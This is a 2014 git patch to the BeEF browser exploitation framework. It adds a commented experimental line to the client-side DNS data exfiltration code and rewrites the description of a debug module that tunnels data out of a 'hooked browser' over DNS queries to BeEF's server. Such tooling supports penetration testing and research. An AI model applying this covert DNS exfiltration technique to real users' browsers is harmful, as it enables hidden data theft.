From 6b93b09c2f4b57108d89fdfa6712d32b43732ac7 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Sun, 29 Jun 2014 13:20:11 +0200 Subject: [PATCH] #970 Updated DNS tunnel debug module config.yaml description --- core/main/client/net/dns.js | 3 +++ modules/debug/test_dns_tunnel_client/config.yaml | 2 +- 2 files changed, 4 insertions(+), 1 deletion(-) diff --git a/core/main/client/net/dns.js b/core/main/client/net/dns.js index 106b6e698..95b86f8a5 100644 --- a/core/main/client/net/dns.js +++ b/core/main/client/net/dns.js @@ -67,6 +67,9 @@ beef.net.dns = { img.onload = function() { dom.removeChild(this); } img.onerror = function() { dom.removeChild(this); } dom.appendChild(img); + + //experimental + //setTimeout(function(){dom.removeChild(img)},1000); }; var segments = encodedData.chunk(max_data_segment_length); diff --git a/modules/debug/test_dns_tunnel_client/config.yaml b/modules/debug/test_dns_tunnel_client/config.yaml index f762978fb..fec90b943 100644 --- a/modules/debug/test_dns_tunnel_client/config.yaml +++ b/modules/debug/test_dns_tunnel_client/config.yaml @@ -9,7 +9,7 @@ beef: enable: true category: "Debug" name: "DNS Tunnel" - description: "This module sends data one way over DNS, client to server only. BeEF's DNS server is used to reconstruct chunks of data being extruded via DNS.
Make sure that:
- the DNS extension is enabled,
- listening on port 53,
- you defined a wildcard rule for processing DNS queries on subdomains such as 'pattern': '\\.*.browserhacker.com'" + description: "This module sends data one way over DNS, client to server only. BeEF's DNS server is used to reconstruct chunks of data being extruded via DNS.
Make sure that:
- the DNS extension is enabled,
- the DNS server is listening on port 53,
- the hooked browser is resolving the domain you specified via BeEF's DNS server.

By default all DNS requests used to extrude data return NXDomain responses." authors: ["antisnatchor", "wade", "bcoles"] target: working: "All"